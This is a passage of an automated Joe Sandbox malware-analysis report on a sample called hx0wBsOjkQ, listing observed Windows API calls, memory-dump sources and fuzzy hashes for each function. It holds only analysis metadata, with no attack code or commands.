                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673435376.00000000006CB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673544502.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673560468.000000000085B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_3e0000_hx0wBsOjkQ.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ComputerName
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3545744682-0
                                                                                                                                                                                                                                                                • Opcode ID: 22c2b97a0e3656c49e56ff3915d779c699a25034ea094c46600f3824519f0cf5
                                                                                                                                                                                                                                                                • Instruction ID: 9bc9d3989f2931102bcc11af4316d2a08de68643a03c4fb0dd6966bf59ce211a
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 22c2b97a0e3656c49e56ff3915d779c699a25034ea094c46600f3824519f0cf5
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C321C7705087918BE7258B24C460732BBE1BF5B304F1885DED4D39B782CA78A446C766
                                                                                                                                                                                                                                                                Function 0041E0A0 Relevance: 1.5, APIs: 1, Instructions: 31memoryCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • RtlReAllocateHeap.NTDLL(?,00000000), ref: 0041E0E0
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1673122276.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673104363.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673122276.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673173269.0000000000433000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.0000000000435000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673435376.00000000006CB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673544502.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673560468.000000000085B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_3e0000_hx0wBsOjkQ.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: AllocateHeap
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                • Opcode ID: 79942e0ae7b7fd83abcb9962e7566e4e5324f1d8dc3d019521915141d9925f84
                                                                                                                                                                                                                                                                • Instruction ID: b3e9e8cf49489420653d487da4a856539fb3a2a869165b0f64d876ec9286bac7
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 79942e0ae7b7fd83abcb9962e7566e4e5324f1d8dc3d019521915141d9925f84
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9DF0EC75524231FBC3103F35BD05A973A65EFC7710F46043AF40456120DB78DC57859A
                                                                                                                                                                                                                                                                Function 003EEC77 Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 003EECA2
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1673122276.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673104363.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673122276.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673173269.0000000000433000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.0000000000435000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673435376.00000000006CB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673544502.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673560468.000000000085B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_3e0000_hx0wBsOjkQ.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: InitializeSecurity
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 640775948-0
                                                                                                                                                                                                                                                                • Opcode ID: 2fe41a125ae2e2b53886a869994b91e079ae6451d625c077529d83772e4971fb
                                                                                                                                                                                                                                                                • Instruction ID: 4f432b557978ba08edb07b7cc428b0ebe6601786debbefd1a476b761117b21fd
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2fe41a125ae2e2b53886a869994b91e079ae6451d625c077529d83772e4971fb
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 87E092343EA3427AF6B986149C63F65A1169B42F35F706318B7213E3D4CAE03102400D
                                                                                                                                                                                                                                                                Function 00410B2B Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1673122276.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673104363.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673122276.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673173269.0000000000433000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.0000000000435000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673435376.00000000006CB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673544502.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673560468.000000000085B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_3e0000_hx0wBsOjkQ.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: BlanketProxy
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3890896728-0
                                                                                                                                                                                                                                                                • Opcode ID: 146f0f11434e54b886fb72fb26550cf554f03b5545507e84a012f50dc8b00c99
                                                                                                                                                                                                                                                                • Instruction ID: 74bb1dfc9d582e645fe5f279f8039c081994c27423f502fc98e072452548bdfa
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 146f0f11434e54b886fb72fb26550cf554f03b5545507e84a012f50dc8b00c99
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 27F0DAB4209701CFE354DF28D5A471ABBF0FB88304F50885CE4968B3A0CB75AA49CF82
                                                                                                                                                                                                                                                                Function 004128EB Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1673122276.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673104363.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673122276.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673173269.0000000000433000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.0000000000435000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673435376.00000000006CB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673544502.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673560468.000000000085B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_3e0000_hx0wBsOjkQ.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: BlanketProxy
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3890896728-0
                                                                                                                                                                                                                                                                • Opcode ID: 46d7f4c9eaf2976959412a5ea02200cf81830fa23e38cbde11d3b3a559f60273
                                                                                                                                                                                                                                                                • Instruction ID: ff571dc4832dad58d510211cb15e6301e01a9ae14fa6040b16d8db90da30e49a
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 46d7f4c9eaf2976959412a5ea02200cf81830fa23e38cbde11d3b3a559f60273
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D2F07A746093418FE314DF24C5A871BBBF0BB84308F00891DE5998B390C7B59549CF82
                                                                                                                                                                                                                                                                Function 003E9EB7 Relevance: 1.5, APIs: 1, Instructions: 18networkCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • WSAStartup.WS2_32(00000202,?), ref: 003E9ED2
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1673122276.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673104363.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673122276.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673173269.0000000000433000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.0000000000435000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673435376.00000000006CB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673544502.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673560468.000000000085B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_3e0000_hx0wBsOjkQ.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Startup
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 724789610-0
                                                                                                                                                                                                                                                                • Opcode ID: c43c4f1ae68ed7ed140e58d1aaff6c4b669236f739dd9d4fa07e69bcf1de74d0
                                                                                                                                                                                                                                                                • Instruction ID: 40c7eb241a67f5b443cbfdff82e028c697e87dd8914cb0e8d99f2ee6df6df27a
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c43c4f1ae68ed7ed140e58d1aaff6c4b669236f739dd9d4fa07e69bcf1de74d0
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0DE02B337406029BD700DB30FC47E897356DB153457059439E905C1171EA72A422DA54
                                                                                                                                                                                                                                                                Function 0041C570 Relevance: 1.5, APIs: 1, Instructions: 15memoryCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • RtlFreeHeap.NTDLL(?,00000000,?,0041E0F9), ref: 0041C590
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1673122276.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673104363.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673122276.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673173269.0000000000433000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.0000000000435000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673435376.00000000006CB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673544502.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673560468.000000000085B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_3e0000_hx0wBsOjkQ.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: FreeHeap
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3298025750-0
                                                                                                                                                                                                                                                                • Opcode ID: cbfbbdb66ed44276ee2861b8c13716e9fa1781eb1df179db539da1619fd76e2a
                                                                                                                                                                                                                                                                • Instruction ID: 74b49eca21872e81413053d509b91f93d85bf0514c30bb56d7d0c5bdb1ee04ed
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cbfbbdb66ed44276ee2861b8c13716e9fa1781eb1df179db539da1619fd76e2a
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D4D01231515132FBC6103F28BC06BCB3B94EF49320F0708A1F504AA074C764EC92CAD8
                                                                                                                                                                                                                                                                Function 0041C55C Relevance: 1.5, APIs: 1, Instructions: 5memoryCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(?,00000000), ref: 0041C561
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1673122276.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673104363.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673122276.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673173269.0000000000433000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.0000000000435000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673435376.00000000006CB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673544502.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673560468.000000000085B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_3e0000_hx0wBsOjkQ.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: AllocateHeap
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                • Opcode ID: d000aadc7a5bf7a9c446b9063edb3d64233d0f416ffae42e437b1145870e8581
                                                                                                                                                                                                                                                                • Instruction ID: b3866039d7872d56e5ca8e8c5aac60e0bc4dd4a0ee4263e8688ffc65fe8c6553
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d000aadc7a5bf7a9c446b9063edb3d64233d0f416ffae42e437b1145870e8581
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 49A00271184210DFDA562F24FD0AFC47B21EF58721F1351A1F101590F6C7B2DC92DA88
                                                                                                                                                                                                                                                                Function 004393E5 Relevance: 1.3, APIs: 1, Instructions: 33memoryCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • VirtualAlloc.KERNELBASE(00000000), ref: 00439AD9
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1673190188.0000000000435000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673104363.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673122276.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673122276.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673173269.0000000000433000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673435376.00000000006CB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673544502.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673560468.000000000085B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_3e0000_hx0wBsOjkQ.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: AllocVirtual
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 4275171209-0
                                                                                                                                                                                                                                                                • Opcode ID: 6a48b079e76c774bef598e18d679ec5c55c7e31c20ec70b3e59bc242ae236d02
                                                                                                                                                                                                                                                                • Instruction ID: 495bda3ebe7b40bca5633a7038eadfc76050ff8e2d1152acfd6af909354f1e32
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6a48b079e76c774bef598e18d679ec5c55c7e31c20ec70b3e59bc242ae236d02
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4BF0F4B010CA04DFEB097F18D89167DBBE0EF48700F12092EEAC287790E6355890DB4B
                                                                                                                                                                                                                                                                Function 00439A5F Relevance: 1.3, APIs: 1, Instructions: 32memoryCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • VirtualAlloc.KERNELBASE(00000000), ref: 0043A553
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1673190188.0000000000435000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673104363.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673122276.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673122276.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673173269.0000000000433000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673435376.00000000006CB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673544502.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673560468.000000000085B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_3e0000_hx0wBsOjkQ.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: AllocVirtual
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 4275171209-0
                                                                                                                                                                                                                                                                • Opcode ID: 22a0659eb249e855ca052ed4887fe28f47a3cd9c5f28f4265d027ffdd3048294
                                                                                                                                                                                                                                                                • Instruction ID: a72415683d738976694720388d67df0f88fc10784aa70ac4c14470258d2fbdef
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 22a0659eb249e855ca052ed4887fe28f47a3cd9c5f28f4265d027ffdd3048294
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CFF08C7298C305DBC7005F79C88825EF7A0FF68760F29861EAA9583650D67A4C61CF07

                                                                                                                                                                                                                                                                Non-executed Functions

                                                                                                                                                                                                                                                                Function 004042D0 Relevance: 43.1, APIs: 2, Strings: 22, Instructions: 1129COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 004043AA
                                                                                                                                                                                                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 0040443E
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
